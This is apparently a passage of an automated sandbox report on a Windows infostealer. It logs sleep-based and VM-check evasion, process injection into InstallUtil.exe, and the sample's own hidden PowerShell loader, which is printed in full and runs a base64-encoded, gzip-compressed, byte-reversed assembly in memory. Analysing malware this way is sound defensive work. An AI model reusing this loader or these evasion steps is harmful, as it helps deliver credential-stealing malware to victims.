Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -595735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep count: 33 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2300 Thread sleep count: 4411 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2300 Thread sleep count: 5390 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -599109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598998s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598883s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598773s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598664s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -598000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597193s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -597078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596968s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596699s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596432s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596153s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -596029s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595918s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595811s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595696s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595445s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595335s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595216s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -595000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594780s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594561s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594303s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -594031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -593873s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -593764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -593656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -593546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -593437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072 Thread sleep time: -593327s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599076
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598966
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598835
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598712
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598593
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598244
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598016
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597766
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597193
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596948
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596698
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596567
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596230
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 595982
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 595867
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596699
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595811
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593873
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593327
Source: 849128312.cmd.Fjz, 00000007.00000002.2223259743.0000000008FD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: 849128312.cmd.Fjz, 00000007.00000002.2171542081.0000000002C90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: 849128312.cmd.Fjz, 00000007.00000002.2211783683.00000000073EC000.00000004.00000020.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2209619324.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process token adjusted: Debug
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 780000 value starts with: 4D5A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C48008
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 780000
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 782000
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EC000
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EE000
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 570008
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' | Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() | Out-Null"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\849128312.cmd.Fjz c:\users\user\desktop\849128312.cmd.fjz -windowstyle hidden -command "$kxrvrz = get-content 'c:\users\user\desktop\849128312.cmd' | select-object -last 1; $rztxxaika = [system.convert]::frombase64string($kxrvrz);$jjvgcfjmzi = new-object system.io.memorystream( , $rztxxaika );$cheoysx = new-object system.io.memorystream;$vrypedkztmk = new-object system.io.compression.gzipstream $jjvgcfjmzi, ([io.compression.compressionmode]::decompress);$vrypedkztmk.copyto( $cheoysx );$vrypedkztmk.close();$jjvgcfjmzi.close();[byte[]] $rztxxaika = $cheoysx.toarray();[array]::reverse($rztxxaika); $nlmpmdzvlef = [system.appdomain]::currentdomain.load($rztxxaika); $hncpdnhhl = $nlmpmdzvlef.entrypoint; [system.delegate]::createdelegate([action], $hncpdnhhl.declaringtype, $hncpdnhhl.name).dynamicinvoke() | out-null"
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Queries volume information: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
